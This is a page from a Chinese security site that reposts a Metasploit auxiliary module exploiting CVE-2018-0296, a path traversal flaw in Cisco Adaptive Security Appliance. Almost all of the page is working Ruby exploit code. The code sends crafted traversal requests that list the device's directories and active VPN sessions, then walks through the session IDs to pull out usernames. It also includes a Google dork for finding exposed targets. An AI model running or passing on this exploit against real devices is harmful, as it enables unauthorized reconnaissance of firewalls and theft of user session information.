首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Cisco Adaptive Security Appliance Path Traversal
来源:metasploit.com 作者:Ruwantha 发布时间:2018-07-25  
require 'msf/core'

	class MetasploitModule < Msf::Auxiliary

		include Msf::Exploit::Remote::HttpClient

		    def initialize(info={})
			super(update_info(info,
			    'Name'           => "Cisco Adaptive Security Appliance  - Path Traversal",
			    'Description'    => %q{
				    Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
				A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques.
				Google Dork:inurl:+CSCOE+/logon.html
			    },
			    'License'        => MSF_LICENSE,
			    'Author'         =>
				[
				    'Yassine Aboukir',   #Initial  discovery
				    'Angelo Ruwantha @h3llwings'  	  #msf module
				],
			    'References'     =>
				[
				    ['EDB', '44956'],
				    ['URL', 'https://www.exploit-db.com/exploits/44956/']
				],
			    'Arch'           => ARCH_CMD,
			   'Compat'          =>
				{
				    'PayloadType' => 'cmd'
				},
			    'Platform'       => ['unix','linux'],
			    'Targets'        =>
				[
				    ['3000 Series Industrial Security Appliance (ISA)
					ASA 1000V Cloud Firewall
					ASA 5500 Series Adaptive Security Appliances
					ASA 5500-X Series Next-Generation Firewalls
					ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
					Adaptive Security Virtual Appliance (ASAv)
					Firepower 2100 Series Security Appliance
					Firepower 4100 Series Security Appliance
					Firepower 9300 ASA Security Module
					FTD Virtual (FTDv)', {}]
				],
			    'Privileged'     => false,
			    'DefaultTarget'  => 0))

				register_options(
				[
					OptString.new('TARGETURI', [true, 'Ex: https://vpn.example.com', '/']),
					OptString.new('SSL', [true, 'set it as true', 'true']),
					OptString.new('RPORT', [true, '443', '443']),
				], self.class)
		end


		def run
			uri = target_uri.path

			res = send_request_cgi({
				'method'   => 'GET',
				'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'),
				
			})
 

			if res && res.code == 200 && res.body.include?("{'name'")
				print_good("#{peer} is Vulnerable")
				print_status("Directory Index ")
				print_good(res.body)
			       res_dir = send_request_cgi({
				'method'   => 'GET',
				'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'),
				
				})
				res_users = send_request_cgi({
				'method'   => 'GET',
				'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'),
				
				})
				userIDs=res_users.body.scan(/[0-9]\w+/).flatten
				
				print_status("CSCEO Directory ") 
				print_good(res_dir.body)
		
				print_status("Active Session(s) ")
				print_status(res_users.body)
				x=0
				begin
				print_status("Getting User(s)")
				while (x<=userIDs.length)
					users = send_request_cgi({
					'method'   => 'GET',
					'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'+userIDs[x]),
					
					})
				 
					grab_username=users.body.scan(/user:\w+/)
					nonstr=grab_username
					if (!nonstr.nil? && nonstr!="")
						print_good("#{nonstr}")
					end
					x=x+1
				end
				rescue
					print_status("Complete")
				end
				 
				 
			else
				print_error("safe")
				return Exploit::CheckCode::Safe
			end
		end
	end

 

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Micro Focus Secure Messaging G
·Network Manager VPNC 1.2.4 Pri
·Tenda Wireless N150 Router 5.0
·Windows Speech Recognition - B
·Davolink DVW 3200 Router - Pas
·Splinterware System Scheduler
·Google Chrome - SwiftShader Op
·Google Chrome - Swiftshader Bl
·Microsoft dnslint.exe DNS Tool
·CMS Made Simple 2.2.5 Authenti
·PrestaShop < 1.6.1.19 - AES CB
·Modx Revolution Remote Code Ex
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved